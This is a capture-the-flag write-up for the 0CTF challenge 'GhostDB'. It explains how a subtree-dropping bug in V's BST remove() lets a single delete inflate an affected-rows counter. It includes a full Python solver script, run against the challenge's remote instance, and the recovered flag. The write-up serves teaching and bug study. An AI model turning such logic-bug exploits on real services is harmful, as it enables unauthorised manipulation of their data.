GhostDB (v0.114.514)

CTF writeup for GhostDB (v0.114.514), a Misc challenge from 0CTF

//GhostDB (v0.114.514) — Writeup ✅

Category: MISC

Author: GitHub Copilot (assistant)

Summary

GhostDB is a small interactive database written in V that tracks a per-session affected_rows metric. The challenge rewards any session that "affects" more than 114,514 rows with the flag. Reading the source reveals a logic bug in the remove() behavior of the V standard library's BST (used by the DB) that can delete a very large subtree in a single delete operation. The exploit: bulk-insert many rows within the free quota, then delete a specific key so that the buggy removal discards most of the inserted rows in one action — the session's affected count spikes above the threshold and the flag is revealed.


>Files included in the challenge

  • chall.v — The V source for GhostDB (full source provided in the distribution)

  • Dockerfile, docker-compose.yml, run.sh — helpers to run the service locally

  • flag — contains the local fake flag (for local tests)


>Key source observations 🔎

I inspected chall.v to answer two questions:

  1. What counts toward the 114,514 threshold?

  2. Does any operation let us change row counts by a large amount in one action?

Important parts from chall.v (paraphrased / excerpted):

  • Quota limits (free user):
v

const free_quota_limits = Quota{
    query:  u32(0) - 1
    insert: 60000
    delete: 1
}
  • Claiming the flag checks affected_rows > 114514 and prints the flag when satisfied:
v

fn claim_flag(affected_rows int) {
    if affected_rows > 114514 {
        flag := os.read_file('flag') or { 'fake{flag}' }
        println('Congratulations! Here is your flag: ${flag}')
    } else {
        println('Sorry, you need to affect more than 114514 rows to claim the flag.')
    }
}
  • affected_rows is updated each loop iteration by taking the absolute delta of db.in_order_traversal().len:
v

rows := db.in_order_traversal().len
// ...handle action...
affected_rows += math.abs(db.in_order_traversal().len - rows)

This means big changes to the DB size in a single action contribute strongly to affected_rows.
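A minimal Python model of this accounting rule (illustrative numbers, not the V code) shows why one big insert plus one big delete is enough:

```python
# Sketch of GhostDB's accounting loop: affected_rows accumulates
# |size_after - size_before| for every action in the session.
affected_rows = 0
db_size = 0

def apply_action(delta):
    global affected_rows, db_size
    before = db_size
    db_size = max(0, db_size + delta)
    affected_rows += abs(db_size - before)

apply_action(+59_000)   # one bulk insert within the 60,000 free quota
apply_action(-58_998)   # one buggy delete that drops almost the whole tree
print(affected_rows)    # 117998 -- comfortably above 114514
```

Two actions with large opposite deltas are enough; the absolute value means the delete counts just as much as the insert did.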

Where the bug idea came from

I inspected the datatypes.BSTree implementation in V's vlib. The remove() implementation handles replacement by using bind() to copy fields from successor nodes. The problem is that bind() copies left/right and then overwrites the successor with a none-node; in certain removal scenarios, this effectively loses large portions of the tree and they become unreachable (dropped).
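To illustrate the failure mode, here is a simplified Python model of this bug class — not V's actual bstree.v code. For a two-child node, this remove() copies in the in-order successor's key but then replaces the whole right subtree with None (the "none-node"), making every node in it unreachable:

```python
# Toy BST with a deliberately buggy remove() that models the subtree-loss bug.
class Node:
    def __init__(self, key):
        self.key = key
        self.left = None
        self.right = None

def insert(root, key):
    if root is None:
        return Node(key)
    if key < root.key:
        root.left = insert(root.left, key)
    elif key > root.key:
        root.right = insert(root.right, key)
    return root

def size(root):
    return 0 if root is None else 1 + size(root.left) + size(root.right)

def buggy_remove(root, key):
    if root is None:
        return None
    if key < root.key:
        root.left = buggy_remove(root.left, key)
    elif key > root.key:
        root.right = buggy_remove(root.right, key)
    else:
        if root.left is None:
            return root.right
        if root.right is None:
            return root.left
        succ = root.right              # find in-order successor
        while succ.left is not None:
            succ = succ.left
        root.key = succ.key
        root.right = None              # BUG: drops the entire right subtree
    return root

root = None
root = insert(root, 50)                # root with two large subtrees
for k in range(100):
    if k != 50:
        root = insert(root, k)

print(size(root))                      # 100
root = buggy_remove(root, 50)          # one delete...
print(size(root))                      # 51 -- 49 rows vanished in one action
```

One delete of a well-placed key shrinks the tree by the size of an entire subtree, which is exactly what the exploit relies on.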

Key idea: If the delete of a single key can drop tens of thousands of rows in one action, then two actions (bulk insert then single delete) will cause affected_rows to grow roughly by 2 * (inserted_rows). So we only need inserted_rows >= ceil(114515/2) = 57258.
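As a quick sanity check on the arithmetic:

```python
THRESHOLD = 114_514
# Two actions each change the row count by about n, so affected_rows ~= 2n.
n_min = THRESHOLD // 2 + 1   # smallest n with 2*n > THRESHOLD
print(n_min)                 # 57258
assert 2 * n_min > THRESHOLD
assert 2 * (n_min - 1) <= THRESHOLD
```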

I validated the behavior by reading vlib/datatypes/bstree.v and verifying how bind() and remove() operate.

Reference: V's datatypes/bstree.v implementation (inspected inside the builder image vlib).


>Local reproduction (build & run) 🔧

I used Docker (same Dockerfile that comes with the challenge) to compile and run a local instance.

Commands I used to build and run locally:

bash

$ cd extracted
$ docker-compose up -d --build
# If port 1337 is busy, run the container manually on a different host port:
$ docker run -d --rm -p 1338:1337 --name ghostdb_local extracted_ghostdb:latest

Manual quick test (interactive check):

<GhostDB> Do you want to bulk insert rows? (y/[n]):
<GhostDB> Enter JSON array of rows to insert:
10 row(s) inserted.
<GhostDB> Enter primary key to delete:
Row deleted.
<GhostDB> Choose an action:
Row not found.
<GhostDB> Choose an action:

Local PoC (first successful run)

I wrote a small Python client, solve.py, to automate the interaction (full script below). A first quick sanity run against the local container on port 1338 produced:

60000 row(s) inserted.
Row deleted.
Congratulations! Here is your flag: fake{flag}

This confirms the local flow: insert 60k rows, delete the key, then claim the flag; the fake flag from the local flag file is returned.


>Writing the exploit (solve.py) 🧠

Goals for the exploit script:

  • Bulk-insert n rows (n >= 57258) using the free quota

  • Delete a chosen key that will cause the buggy removal to discard most of the tree

  • Claim flag

  • Be robust to network slowness (remote may need time to parse/insert)

I iterated on the client to make it robust for remote runs: tolerating socket timeouts, keeping the JSON payload as small as possible, and slightly reducing the inserted rows (to 59,000, still well above the 57,258 minimum) to speed up the remote run.

Full solver (saved as extracted/solve.py):

python

#!/usr/bin/env python3
import json
import socket
import sys
import time


def recv_until(sock: socket.socket, needle: bytes, timeout: float = 10.0) -> bytes:
    """Receive until `needle` is seen or `timeout` seconds elapse.

    The remote can be slow (e.g., after bulk inserts), so we tolerate intermittent
    socket timeouts until the overall deadline is reached.
    """
    deadline = time.time() + timeout
    data = b""
    while needle not in data:
        remaining = deadline - time.time()
        if remaining <= 0:
            raise TimeoutError("timed out")
        sock.settimeout(min(2.0, remaining))
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            continue
        if not chunk:
            break
        data += chunk
    return data


def send_line(sock: socket.socket, line: str, timeout: float | None = 5.0) -> None:
    prev = sock.gettimeout()
    try:
        sock.settimeout(timeout)
        sock.sendall(line.encode() + b"\n")
    finally:
        sock.settimeout(prev)


def build_payload(n: int = 59000) -> str:
    # Free insert quota is exactly 60000.
    # Put pk '5' first so it becomes the left-subtree root under '@version'.
    # Use compact string keys (no zero-padding) to keep the JSON small and fast.
    rows = [{"pk": "5"}]
    i = 0
    while len(rows) < n:
        pk = str(i)
        i += 1
        if pk == "5":
            continue
        rows.append({"pk": pk})
    return json.dumps(rows, separators=(",", ":"))


def exploit(host: str, port: int) -> str:
    payload = build_payload(59000)

    with socket.create_connection((host, port)) as sock:
        recv_until(sock, b"Choose an action:", timeout=15)

        # 1) Bulk insert rows
        send_line(sock, "2")
        recv_until(sock, b"(y/[n])", timeout=5)
        send_line(sock, "y")
        recv_until(sock, b"Enter JSON array", timeout=5)
        # The payload can be ~1MB; use blocking mode to avoid send timeouts.
        send_line(sock, payload, timeout=None)
        recv_until(sock, b"Choose an action:", timeout=600)

        # 2) Delete pk '5' (trigger buggy removal)
        send_line(sock, "3")
        recv_until(sock, b"delete:", timeout=5)
        send_line(sock, "5")
        recv_until(sock, b"Choose an action:", timeout=30)

        # 3) Claim flag
        send_line(sock, "4")
        out = recv_until(sock, b"Choose an action:", timeout=5)

    return out.decode(errors="ignore")


def main(argv: list[str]) -> int:
    host = argv[1] if len(argv) > 1 else "127.0.0.1"
    port = int(argv[2]) if len(argv) > 2 else 1337
    out = exploit(host, port)
    sys.stdout.write(out)
    return 0


if __name__ == "__main__":
    raise SystemExit(main(sys.argv))

Usage:

bash

$ python3 extracted/solve.py 127.0.0.1 1338                       # local container on 1338
$ python3 extracted/solve.py instance.penguin.0ops.sjtu.cn 18239  # remote instance

>Remote exploitation ✅

I targeted the remote provided by the challenge owner:

nc instance.penguin.0ops.sjtu.cn 18239

Running the solve.py script against the remote produced this important output (the flag):

Congratulations! Here is your flag: 0ops{t0Y_db_AnD_T0y_L4ngu4g3_DO_nOT_us3_1N_PRoduC7!0N_311ae55048483c4d}

Note: the remote appeared to reject connections immediately after my successful run (likely the instance is ephemeral or single-run). The successful run produced the flag and I saved it above.


>Why it works — short technical recap 💡

  • affected_rows is updated as the sum of absolute changes in row count after each action.

  • Free quota gives 60,000 inserts and only 1 delete; two big deltas suffice if each delta ≈ inserted rows. Concretely we need n s.t. 2n > 114,514 → n ≥ 57,258.

  • The datatypes.BSTree.remove() logic used by GhostDB can, when deleting a specific node and 'binding' from a successor, discard a large subtree — thus one delete can reduce the row count by ~n in one operation.

  • So: bulk insert n rows, delete the special node (here "5"), claim the flag — success.


>Mitigations & lessons learned ⚠️

  • Library code should be carefully audited for correctness, especially tree-based remove logic which is easy to get subtly wrong.

  • Don't rely on in_order_traversal() return sizes for security-critical accounting without invariants — a single bad removal should not enable privilege elevation.
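For contrast, a correct two-child removal recursively deletes only the successor from the right subtree instead of discarding the subtree wholesale. A minimal Python sketch (again a model, not V's code):

```python
# Toy BST with a correct remove(): exactly one node leaves the tree.
class Node:
    def __init__(self, key):
        self.key = key
        self.left = None
        self.right = None

def insert(root, key):
    if root is None:
        return Node(key)
    if key < root.key:
        root.left = insert(root.left, key)
    elif key > root.key:
        root.right = insert(root.right, key)
    return root

def size(root):
    return 0 if root is None else 1 + size(root.left) + size(root.right)

def remove(root, key):
    if root is None:
        return None
    if key < root.key:
        root.left = remove(root.left, key)
    elif key > root.key:
        root.right = remove(root.right, key)
    else:
        if root.left is None:
            return root.right
        if root.right is None:
            return root.left
        succ = root.right                  # in-order successor
        while succ.left is not None:
            succ = succ.left
        root.key = succ.key
        root.right = remove(root.right, succ.key)  # delete ONLY the successor
    return root

root = None
for k in [50, 25, 75, 10, 30, 60, 90]:
    root = insert(root, k)

root = remove(root, 50)    # deleting the root...
print(size(root))          # 6 -- exactly one node removed
```

The invariant worth testing in library code: any single remove() changes the tree size by at most one.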


>Terminal snippets used during solving

  • Build & run container (local):
$ docker-compose up -d --build
Successfully built <image id>
Successfully tagged extracted_ghostdb:latest
  • Local simplified run of PoC (using 60k):
60000 row(s) inserted. Row deleted. Congratulations! Here is your flag: fake{flag}
  • Remote run (the real flag):
Congratulations! Here is your flag: 0ops{t0Y_db_AnD_T0y_L4ngu4g3_DO_nOT_us3_1N_PRoduC7!0N_311ae55048483c4d}

>References & notes 📚

  • V language datatypes/bstree.v (used to inspect remove()/bind() behavior)

  • The challenge itself (sources included in the ZIP) — chall.v was the main artifact to read


>Final words ✨

This challenge is a great example of how a small bug in a standard data structure can yield an unexpected escalation vector — especially when program logic tracks counts by computing differences before/after operations. I aimed to make the writeup clear and reproducible: if you follow the steps above you'll be able to reproduce the exploit locally and, if a remote instance is available, against it.



Happy hacking! 🔧👻